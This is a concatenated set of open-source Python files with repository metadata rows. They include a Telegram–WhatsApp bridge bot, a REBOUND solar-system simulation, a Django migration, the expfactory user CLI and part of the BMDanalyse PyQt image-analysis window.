scale_factor = max(screen_width / sprite_width, screen_height / sprite_height)
background_sprite.scale = scale_factor
graphics_context.sprite_buffer['background']['battle_background'] = background_sprite
| mit | -1,500,129,962,873,362,000 | 42.814815 | 93 | 0.671901 | false |
LeoGe/whattelcopybot | telegram_bot.py | 1 | 6255 | from multiprocessing import Process, Pipe
from os import getpid, urandom, path
from time import sleep
from enum import Enum
import binascii, json, signal, sys
from random import randint
from telegram.ext import Updater
from telegram.ext.dispatcher import run_async
from telegram.update import Update
class Command(Enum):
message = 1
token = 2
token_ack = 3
delete = 4
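# Messages exchanged with the Whatsapp side over the multiprocessing Pipe are
# plain lists whose first element is a Command value. From the way they are
# built and unpacked in this file:
#   [Command.message, whatsapp_id, text]                 deliver text to a group
#   [Command.token, token, telegram_chat_id]             offer a pairing token
#   [Command.token_ack, whatsapp_id, telegram_chat_id]   confirm a pairing
#   [Command.delete, whatsapp_id]                        drop a pairing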
class TelegramBot(Process):
CREDENTIALS = "<CREDENTIALS-HERE>"
SAVEPATH = path.expanduser("~") + "/.config/whattelcopybot/telegram"
def __init__(self, conn):
self.connection=conn
super(TelegramBot, self).__init__()
self.telegram_to_whatsapp=dict()
with open("tokens.txt") as f:
self.poems = f.read().splitlines()
# save hashmap to file when exit
def save_to_file(self, signum, frame):
with open(TelegramBot.SAVEPATH, 'w+') as f:
f.write(json.dumps(self.telegram_to_whatsapp))
f.truncate()
sys.exit(0)
#load hashmap from file (if it exists and is not empty)
def load_from_file(self):
if path.isfile(TelegramBot.SAVEPATH):
with open(TelegramBot.SAVEPATH) as f:
read=f.read()
if read!="":
self.telegram_to_whatsapp = json.loads(read)
#send message to Telegram chat
def got_whatsapp(self, bot, msg):
if not "," in msg:
bot.sendMessage(int(msg), "Success: Connected to Whatsapp group!")
else:
telegram_id, content = msg.split(",")
bot.sendMessage(int(telegram_id), text=content)
# if both groups are connected send message to WhatsappBot
def got_telegram(self,bot,update):
if not type(update) is Update or update.message == None:
return
if update.message.new_chat_participant!=None:
if update.message.new_chat_participant.username=="WhattelCopyBot":
self.help(bot,update)
elif update.message.left_chat_participant!=None:
if update.message.left_chat_participant.username=="WhattelCopyBot":
print("REMOVE")
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
elif str(update.message.chat_id) in self.telegram_to_whatsapp:
whatsapp_id=self.telegram_to_whatsapp[str(update.message.chat_id)]
self.connection.send([Command.message, whatsapp_id, update.message.from_user.first_name+ ": " + update.message.text])
def help(self,bot,update):
helpText="Hello Traveller, my name is John Whattel. I will copy all of your messages from whatsapp to telegram and vice versa.\n/token (generate token to connects two chats)\n/delete (disconnects the chats)\n/help (show this notice again)"
bot.sendMessage(update.message.chat_id,text=helpText)
# generate token and send it to WhatsappBot and to the Telegram chat
def get_token(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
bot.sendMessage(update.message.chat_id,text="Sorry, chat is already connected to a Whatsapp group!")
return
        # randint is inclusive at both ends, so the upper bound must be len - 1
        rand_int = randint(0, len(self.poems) - 1)
        while self.poems[rand_int] == "":
            rand_int = randint(0, len(self.poems) - 1)
bot.sendMessage(update.message.chat_id, text="Please paste this token into the Whatsapp chat you want to be connected to. I have to be a member of this chat.")
bot.sendMessage(update.message.chat_id, text="Generated token: "+self.poems[rand_int])
self.connection.send([Command.token, self.poems[rand_int], update.message.chat_id])
self.poems[rand_int]=""
def delete(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
bot.sendMessage(update.message.chat_id, text="Hey there, this chat connecion was deleted")
else:
bot.sendMessage(update.message.chat_id, text="Something went terribly wrong :( This chat is not connected")
def run(self):
print("Start TelegramBot with PID: " + str(getpid()))
# connect to TelegramBot with CREDENTIALS
updater = Updater(TelegramBot.CREDENTIALS)
# Get the dispatcher to register handlers
dp = updater.dispatcher
# Message handlers only receive updates that don't contain commands
dp.addTelegramMessageHandler(self.got_telegram)
# got a whatsapp message
dp.addStringRegexHandler('[^/].*', self.got_whatsapp)
dp.addTelegramCommandHandler("help", self.help)
dp.addTelegramCommandHandler("token", self.get_token)
dp.addTelegramCommandHandler("delete", self.delete)
# All TelegramErrors are caught for you and delivered to the error
# handler(s). Other types of Errors are not caught.
#dp.addErrorHandler(error)
# Start the Bot and store the update Queue, so we can insert updates
update_queue = updater.start_polling(poll_interval=0.1, timeout=10)
# save our hashmap when the TelegramBot is terminated
signal.signal(signal.SIGINT, self.save_to_file)
signal.signal(signal.SIGTERM, self.save_to_file)
# load our hashmap when the TelegramBot is started
self.load_from_file()
isRunning = True
while isRunning:
msg = self.connection.recv()
if msg[0] == Command.message:
update_queue.put(str(msg[1])+","+str(msg[2]))
elif msg[0] == Command.token_ack:
# connect Telegram ID to Whatsapp ID
self.telegram_to_whatsapp[str(msg[2])] = msg[1]
update_queue.put(str(msg[2]))
elif msg[0] == Command.token:
print("Error: got wrong message from WhatsappBot")
| mit | 7,155,374,051,801,064,000 | 42.4375 | 247 | 0.63757 | false |
ah-anssi/SecuML | SecuML/core/DimensionReduction/FeatureSelection.py | 1 | 1077 | # SecuML
# Copyright (C) 2017 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import abc
from .DimensionReduction import DimensionReduction
class FeatureSelection(DimensionReduction):
def __init__(self, conf):
DimensionReduction.__init__(self, conf)
def setProjectionMatrix(self):
self.projection_matrix = None
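        # Feature selection keeps a subset of the original features rather than
        # projecting onto new axes (as e.g. PCA does), so there is presumably no
        # projection matrix to store here.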
@abc.abstractmethod
def generateInputParameters(self, instances):
return
@abc.abstractmethod
def fit(self, instances):
return
| gpl-2.0 | -574,789,287,961,227,200 | 28.916667 | 73 | 0.732591 | false |
quasars100/Resonance_testing_scripts | python_examples/outersolarsystem/problem.py | 1 | 1831 | # Import the rebound module
import rebound
# Set variables (defaults are G=1, t=0, dt=0.01)
k = 0.01720209895 # Gaussian constant
rebound.G = k*k # Gravitational constant
# Setup particles (data taken from NASA Horizons)
# This could also be easily read in from a file.
rebound.add( m=1.00000597682, x=-4.06428567034226e-3, y=-6.08813756435987e-3, z=-1.66162304225834e-6, vx=+6.69048890636161e-6, vy=-6.33922479583593e-6, vz=-3.13202145590767e-9) # Sun
rebound.add( m=1./1047.355, x=+3.40546614227466e+0, y=+3.62978190075864e+0, z=+3.42386261766577e-2, vx=-5.59797969310664e-3, vy=+5.51815399480116e-3, vz=-2.66711392865591e-6) # Jupiter
rebound.add( m=1./3501.6, x=+6.60801554403466e+0, y=+6.38084674585064e+0, z=-1.36145963724542e-1, vx=-4.17354020307064e-3, vy=+3.99723751748116e-3, vz=+1.67206320571441e-5) # Saturn
rebound.add( m=1./22869., x=+1.11636331405597e+1, y=+1.60373479057256e+1, z=+3.61783279369958e-1, vx=-3.25884806151064e-3, vy=+2.06438412905916e-3, vz=-2.17699042180559e-5) # Uranus
rebound.add( m=1./19314., x=-3.01777243405203e+1, y=+1.91155314998064e+0, z=-1.53887595621042e-1, vx=-2.17471785045538e-4, vy=-3.11361111025884e-3, vz=+3.58344705491441e-5) # Neptune
rebound.add( m=0, x=-2.13858977531573e+1, y=+3.20719104739886e+1, z=+2.49245689556096e+0, vx=-1.76936577252484e-3, vy=-2.06720938381724e-3, vz=+6.58091931493844e-4) # Pluto
# Set the center of momentum to be at the origin
rebound.move_to_com()
# timestep counter
steps = 0
# Integrate until t=1e6 (unit of time in this example is days)
while rebound.t < 1e6:
rebound.step()
steps += 1
# Print particle positions every 100 timesteps
if steps%100==0:
for p in rebound.particles:
# time x y z
print(rebound.t, p.x, p.y, p.z)
| gpl-3.0 | 544,620,907,989,148,000 | 58.064516 | 188 | 0.687602 | false |
hzlf/openbroadcast | website/apps/spf/migrations/0020_auto__add_field_match_isrc_list.py | 1 | 5230 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Match.isrc_list'
db.add_column('spf_match', 'isrc_list',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Match.isrc_list'
db.delete_column('spf_match', 'isrc_list')
models = {
'spf.match': {
'Meta': {'ordering': "('created',)", 'object_name': 'Match'},
'artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'artist_credits': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'artist_credits_secondary': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'iswc_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'mb_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'release': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'release_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'request': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['spf.Request']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'work_list': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'spf.request': {
'Meta': {'ordering': "('swp_id',)", 'object_name': 'Request'},
'catalognumber': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'composer': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'duration': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isrc': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'main_artist': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'obp_legacy_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'publication_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'publication_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'recording_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recording_datex': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'results_mb': ('django.db.models.fields.TextField', [], {'default': "'{}'", 'null': 'True', 'blank': 'True'}),
'rome_protected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'swp_id': ('django.db.models.fields.PositiveIntegerField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['spf'] | gpl-3.0 | -3,241,384,390,019,928,600 | 74.811594 | 169 | 0.546654 | false |
vinoth3v/In | In/nabar/admin/form/nabar_role.py | 1 | 1255 |
class FormNabarRoleAdmin(Form):
def __init__(self, data = None, items = None, post = None, **args):
if data is None: data = {}
if post is None: post = {}
if 'id' not in data:
data['id'] = 'FormNabarRoleAdmin'
super().__init__(data, items, **args)
set = self.add('FieldSet', {
'id' : 'set',
'css' : ['i-form-row i-margin-large']
})
table = set.add('HTMLTable')
roles = IN.nabar.roles
for rid, role in roles.items():
row = table['body'].add('HTMLTableRow')
row.add('HTMLTableColumn', {
'value' : role['name'],
'weight' : 1,
})
row.add('HTMLTableColumn', {
'value' : role['info'],
'weight' : 2,
})
set = self.add('FieldSet', {
'id' : 'actionset',
'css' : ['i-form-row i-text-primary']
})
#set.add('Submit', {
#'id' : 'submit',
#'value' : s('Register new account'),
#'css' : ['i-button i-button-primary i-button-large']
#})
self.css.append('i-panel i-panel-box i-margin-large')
@IN.register('FormNabarRoleAdmin', type = 'Former')
class FormNabarRoleAdminFormer(FormFormer):
def validate(self, form, post):
if form.has_errors: # fields may have errors
return
def submit(self, form, post):
if form.has_errors:
return
| apache-2.0 | 6,403,613,754,088,764,000 | 18.307692 | 68 | 0.578486 | false |
expfactory/expfactory | expfactory/cli/users.py | 1 | 3386 | """
Copyright (c) 2017-2021, Vanessa Sochat
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from expfactory.logger import bot
from expfactory.defaults import EXPFACTORY_DATABASE
import sys
import os
def main(args, parser, subparser):
from expfactory.server import app
header = "DATABASE\tTOKEN"
# The user wants to list active subjects
if args.list is True:
users = app.list_users() # returns id\ttoken
sys.exit(0)
# The user wants to add new subjects
number = args.new
if number is not None:
print(header)
for i in range(number):
user = app.generate_user()
app.print_user(user)
sys.exit(0)
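    # Typical invocations, assuming the argparse flags wired to args.list/args.new
    # elsewhere in the package:
    #   expfactory users --list     # list active participants
    #   expfactory users --new 3    # generate three new participant tokens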
# The user wants to manage user token
action = None
if args.revoke is not None:
subid = clean(args.revoke)
func = app.revoke_token
action = "Revoking"
elif args.refresh is not None:
subid = clean(args.refresh)
func = app.refresh_token
action = "Refreshing"
elif args.restart is not None:
subid = clean(args.restart)
func = app.restart_user
action = "Restarting"
elif args.finish is not None:
subid = clean(args.finish)
action = "Finishing"
func = app.finish_user
# Perform the action
if action is not None:
bot.info("%s %s" % (action, subid))
result = func(subid=subid)
if result is not None:
print("[%s] %s --> %s" % (action.lower(), subid, result))
else:
print("[%s] not successful. See logs for details." % (action.lower()))
print("Commands may only possible for [active] status.")
sys.exit(0)
print("See expfactory users --help for usage")
def clean(subid):
"""clean a subid, removing any folder extensions (_revoked or _finished)
for the functions
"""
for ext in ["_revoked", "_revoked"]:
subid = subid.replace(ext, "")
return subid
| bsd-3-clause | 55,951,420,547,235,040 | 33.20202 | 82 | 0.69049 | false |
mhogg/BMDanalyse | BMDanalyse/MainWindow.py | 1 | 30163 | # -*- coding: utf-8 -*-
# Copyright (C) 2016 Michael Hogg
# This file is part of BMDanalyse - See LICENSE.txt for information on usage and redistribution
import os, matplotlib, matplotlib.pyplot, types
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
from pyqtgraph import ImageItem
from pyqtgraph.widgets.GraphicsLayoutWidget import GraphicsLayoutWidget
from PIL import Image
from ViewBoxCustom import MultiRoiViewBox, ImageAnalysisViewBox
from MatplotlibWidget import MatplotlibWidget
from SidePanel import SidePanel
from TableWidget import TableWidget
from version import __version__
absDirPath = os.path.dirname(__file__)
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.loadIcons()
self.setupUserInterface()
self.setupSignals()
self.__version__ = __version__
# Initialise variables
self.imageFiles = {}
self.timeData = None
self.plotWin = None
self.imageWin = None
self.BMDchange = None
self.roiNames = None
def loadIcons(self):
""" Load icons """
self.icons = dict([
('BMDanalyseIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","logo.png"))),
('imageAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_add.png"))),
('imageRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_delete2.png"))),
('imageDownIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-up-2.png"))),
('imageUpIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-down-2.png"))),
('imagePrevIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-left.png"))),
('imageNextIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","arrow-right.png"))),
('roiAddIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","green-add3.png"))),
('roiRectIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","rectangularIcon.png"))),
('roiPolyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","polygonIcon.png"))),
('roiRemIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","red_delete.png"))),
('roiSaveIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","filesave.png"))),
('roiCopyIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","file_copy.png"))),
('roiLoadIcon', QtGui.QIcon(os.path.join(absDirPath,"icons","opened-folder.png")))])
def setupUserInterface(self):
""" Initialise the User Interface """
# Left frame
leftFrame = QtGui.QFrame()
leftFrameLayout = QtGui.QHBoxLayout()
leftFrame.setLayout(leftFrameLayout)
leftFrame.setLineWidth(0)
leftFrame.setFrameStyle(QtGui.QFrame.Panel)
leftFrameLayout.setContentsMargins(0,0,5,0)
# Left frame contents
self.viewMain = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
leftFrameLayout.addWidget(self.viewMain)
self.viewMain.setMinimumSize(200,200)
self.vb = MultiRoiViewBox(lockAspect=True,enableMenu=True)
self.viewMain.addItem(self.vb)
self.vb.disableAutoRange()
# Right frame
self.sidePanel = SidePanel(self)
# UI window (containing left and right frames)
UIwindow = QtGui.QWidget(self)
UIwindowLayout = QtGui.QHBoxLayout()
UIwindowSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
UIwindowLayout.addWidget(UIwindowSplitter)
UIwindow.setLayout(UIwindowLayout)
self.setCentralWidget(UIwindow)
UIwindowSplitter.addWidget(leftFrame)
UIwindowSplitter.addWidget(self.sidePanel)
# Application window
self.setWindowTitle('BMDanalyse')
self.setWindowIcon(self.icons['BMDanalyseIcon'])
self.setMinimumSize(600,500)
self.resize(self.minimumSize())
# Window menus
self.createMenus()
self.createActions()
def createMenus(self):
# Menus
menubar = self.menuBar()
self.fileMenu = menubar.addMenu('&File')
self.imageMenu = menubar.addMenu('&Images')
self.roiMenu = menubar.addMenu('&ROIs')
self.submenu = self.roiMenu.addMenu(self.icons['roiAddIcon'],"Add ROI")
self.analyseMenu = menubar.addMenu('&Analysis')
self.aboutMenu = menubar.addMenu('A&bout')
def createActions(self):
# Actions for File menu
self.exitAct = QtGui.QAction("&Quit", self, shortcut="Ctrl+Q",statusTip="Exit the application")
self.exitAct.triggered[()].connect(self.close)
self.fileMenu.addAction(self.exitAct)
# Actions for Images menu
self.loadImageAct = QtGui.QAction(self.icons['imageAddIcon'], "&Load image(s)", self, shortcut="Ctrl+L")
self.removeImageAct = QtGui.QAction(self.icons['imageRemIcon'], "&Remove current image", self, shortcut="Ctrl+X")
imageMenuActions = [self.loadImageAct,self.removeImageAct]
imageMenuActFuncs = [self.loadImages,self.removeImage]
for i in xrange(len(imageMenuActions)):
action = imageMenuActions[i]
function = imageMenuActFuncs[i]
action.triggered[()].connect(function)
self.imageMenu.addAction(self.loadImageAct)
self.imageMenu.addAction(self.removeImageAct)
# Actions for ROI menu
self.addROIRectAct = QtGui.QAction("Rectangular",self.submenu)
self.addROIPolyAct = QtGui.QAction("Polygon",self.submenu)
self.addROIRectAct.triggered[()].connect(self.vb.addROI)
self.addROIPolyAct.triggered[()].connect(self.vb.addPolyRoiRequest)
self.submenu.addAction(self.addROIRectAct)
self.submenu.addAction(self.addROIPolyAct)
self.addROIRectAct.setIcon(self.icons['roiRectIcon'])
self.addROIPolyAct.setIcon(self.icons['roiPolyIcon'])
self.addROIRectAct.setShortcut("Ctrl+Shift+R")
self.addROIPolyAct.setShortcut("Ctrl+Shift+P")
self.loadRoiAct = QtGui.QAction(self.icons['roiLoadIcon'], "L&oad ROI", self, shortcut="Ctrl+O")
self.copyRoiAct = QtGui.QAction(self.icons['roiCopyIcon'], "&Copy ROI", self, shortcut="Ctrl+C")
self.saveRoiAct = QtGui.QAction(self.icons['roiSaveIcon'], "&Save ROI", self, shortcut="Ctrl+S")
self.remRoiAct = QtGui.QAction(self.icons['roiRemIcon'] , "&Remove ROI", self, shortcut="Ctrl+D")
roiMenuActions = [self.loadRoiAct,self.copyRoiAct,self.saveRoiAct,self.remRoiAct]
roiMenuActFuncs = [self.vb.loadROI,self.vb.copyROI,self.vb.saveROI,self.vb.removeROI]
for i in xrange(len(roiMenuActions)):
action = roiMenuActions[i]
function = roiMenuActFuncs[i]
action.triggered[()].connect(function)
self.roiMenu.addAction(action)
# Actions for Analyse menu
self.roiAnalysisAct = QtGui.QAction("&ROI analysis", self.viewMain, shortcut="Ctrl+R",triggered=self.getBMD)
self.imgAnalysisAct = QtGui.QAction("&Image analysis", self.viewMain, shortcut="Ctrl+I",triggered=self.imageAnalysis)
self.analyseMenu.addAction(self.roiAnalysisAct)
self.analyseMenu.addAction(self.imgAnalysisAct)
        # Actions for About menu
self.aboutAct = QtGui.QAction("&About", self.viewMain, shortcut='F1', triggered=self.onAbout)
self.aboutMenu.addAction(self.aboutAct)
def setupSignals(self):
""" Setup signals """
self.sidePanel.imageFileList.itemSelectionChanged.connect(self.getImageToDisplay)
self.sidePanel.buttImageAdd.clicked.connect(self.loadImages)
self.sidePanel.buttImageRem.clicked.connect(self.removeImage)
self.sidePanel.buttImageUp.clicked.connect(self.sidePanel.moveImageUp)
self.sidePanel.buttImageDown.clicked.connect(self.sidePanel.moveImageDown)
self.sidePanel.roiMenu.button1.clicked[()].connect(self.vb.addROI)
self.sidePanel.roiMenu.button2.clicked[()].connect(self.vb.addPolyRoiRequest)
self.sidePanel.buttRoiCopy.clicked[()].connect(self.vb.copyROI)
self.sidePanel.buttRoiRem.clicked.connect(self.vb.removeROI)
self.sidePanel.buttRoiLoad.clicked.connect(self.vb.loadROI)
self.sidePanel.buttRoiSave.clicked.connect(self.vb.saveROI)
self.sidePanel.buttRoiAnalysis.clicked.connect(self.getBMD)
self.sidePanel.buttImgAnalysis.clicked.connect(self.imageAnalysis)
def onAbout(self):
""" About BMDanalyse message"""
author ='Michael Hogg'
date ='2016'
version = self.__version__
QtGui.QMessageBox.about(self, 'About BMDanalyse',
"""
<b>BMDanalyse</b>
<p>A simple program for the analysis of a time series of Bone Mineral Density (BMD) images.</p>
<p>Used to evaluate the bone gain / loss in a number of regions of interest (ROIs) over time,
typically due to bone remodelling as a result of stress shielding around an orthopaedic implant.</p>
<p><table border="0" width="150">
<tr>
<td>Author:</td>
<td>%s</td>
</tr>
<tr>
<td>Version:</td>
<td>%s</td>
</tr>
<tr>
<td>Date:</td>
<td>%s</td>
</tr>
</table></p>
""" % (author,version,date))
def loadImages(self):
""" Load an image to be analysed """
newImages = {}
fileNames = QtGui.QFileDialog.getOpenFileNames(self, self.tr("Load images"),QtCore.QDir.currentPath())
# Fix for PySide. PySide doesn't support QStringList types. PyQt4 getOpenFileNames returns a QStringList, whereas PySide
# returns a type (the first entry being the list of filenames).
if isinstance(fileNames,types.TupleType): fileNames = fileNames[0]
if hasattr(QtCore,'QStringList') and isinstance(fileNames, QtCore.QStringList): fileNames = [str(i) for i in fileNames]
if len(fileNames)>0:
for fileName in fileNames:
if fileName!='':
img = Image.open(str(fileName))
imgarr = np.array(img.convert('L')) # Convert to 8-bit
imgarr = imgarr.swapaxes(0,1)
imgarr = imgarr[:,::-1]
newImages[fileName] = imgarr
        # Add filenames to list widget. Only add new filenames. If a filename already exists, then
# it will not be added, but data will be updated
for fileName in sorted(newImages.keys()):
if not self.imageFiles.has_key(fileName):
self.sidePanel.addImageToList(fileName)
self.imageFiles[fileName] = newImages[fileName]
# Show image in Main window
self.vb.enableAutoRange()
if self.sidePanel.imageFileList.currentRow()==-1:
self.sidePanel.imageFileList.setCurrentRow(0)
self.showImage(str(self.sidePanel.imageFileList.currentItem().text()))
self.vb.disableAutoRange()
def removeImage(self):
""" Remove image from sidePanel imageFileList """
# Return if there is no image to remove
if self.vb.img is None: return
# Get current image in sidePanel imageFileList and remove from list
currentRow = self.sidePanel.imageFileList.currentRow()
image = self.sidePanel.imageFileList.takeItem(currentRow)
imageName = str(image.text())
# Delete key and value from dictionary
if imageName!='': del self.imageFiles[imageName]
# Get image item in imageFileList to replace deleted image
if self.sidePanel.imageFileList.count()==0:
self.vb.enableAutoRange()
self.vb.removeItem(self.vb.img)
self.vb.showImage(None)
self.vb.disableAutoRange()
else:
currentRow = self.sidePanel.imageFileList.currentRow()
imageName = str(self.sidePanel.imageFileList.item(currentRow).text())
self.showImage(imageName)
def showImage(self,imageFilename):
""" Shows image in main view """
self.arr = self.imageFiles[imageFilename]
self.vb.showImage(self.arr)
def getImageToDisplay(self):
""" Get current item in file list and display in main view"""
try: imageFilename = str(self.sidePanel.imageFileList.currentItem().text())
except: pass
else: self.showImage(imageFilename)
def getBMD(self):
""" Get change in BMD over time (e.g. for each image) for all ROIs.
Revised function that converts the list of images into a 3D array
and then uses the relative position of the ROIs to the current
image, self.vb.img, to get the average BMD value e.g. it doesn't use
setImage to change the image in the view. This requires that all
images are the same size and in the same position.
"""
# Return if there is no image or rois in view
if self.vb.img is None or len(self.vb.rois)==0: return
# Collect all images into a 3D array
imageFilenames = self.sidePanel.getListOfImages()
images = [self.imageFiles[str(name.text())] for name in imageFilenames]
imageData = np.dstack(images) # Doesn't work correctly if images are not all the same shape
numImages = len(images)
# Get BMD across image stack for each ROI
numROIs = len(self.vb.rois)
BMD = np.zeros((numImages,numROIs),dtype=float)
self.roiNames = []
for i in xrange(numROIs):
roi = self.vb.rois[i]
self.roiNames.append(roi.name)
arrRegion = roi.getArrayRegion(imageData,self.vb.img, axes=(0,1))
avgROIvalue = arrRegion.mean(axis=0).mean(axis=0)
BMD[:,i] = avgROIvalue
# Calculate the BMD change (percentage of original)
tol = 1.0e-06
for i in xrange(numROIs):
if abs(BMD[0,i])<tol:
BMD[:,i] = 100.
else:
BMD[:,i] = BMD[:,i] / BMD[0,i] * 100.
self.BMDchange = BMD-100.
if self.timeData is None or self.timeData.size!=numImages:
self.timeData = np.arange(numImages,dtype=float)
# Plot results
self.showResults()
def imageAnalysis(self):
# Generate images of BMD change
if self.vb.img is None: return
self.showImageWin()
def sliderValueChanged(self,value):
self.imageWin.sliderLabel.setText('BMD change: >= %d %s' % (value,'%'))
self.setLookupTable(value)
self.imageWin.vb.img2.setLookupTable(self.lut)
self.imageWin.vb.img2.setLevels([0,255])
def setLookupTable(self,val):
lut = []
for i in range(256):
if i > 127+val:
lut.append(matplotlib.cm.jet(255))
elif i < 127-val:
lut.append(matplotlib.cm.jet(0))
else:
lut.append((0.0,0.0,0.0,0.0))
lut = np.array(lut)*255
self.lut = np.array(lut,dtype=np.ubyte)
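        # The lookup table built above makes pixels whose mapped intensity lies
        # within +/- val of the mid-grey value 127 fully transparent, while larger
        # gains are clamped to the top of the jet colormap and larger losses to the
        # bottom (127 corresponds to 0% BMD change, see imagesBMDpercentChange below).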
def createImageWin(self):
self.buttMinimumSize = QtCore.QSize(70,36)
self.iconSize = QtCore.QSize(24,24)
if self.imageWin==None:
self.imageWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
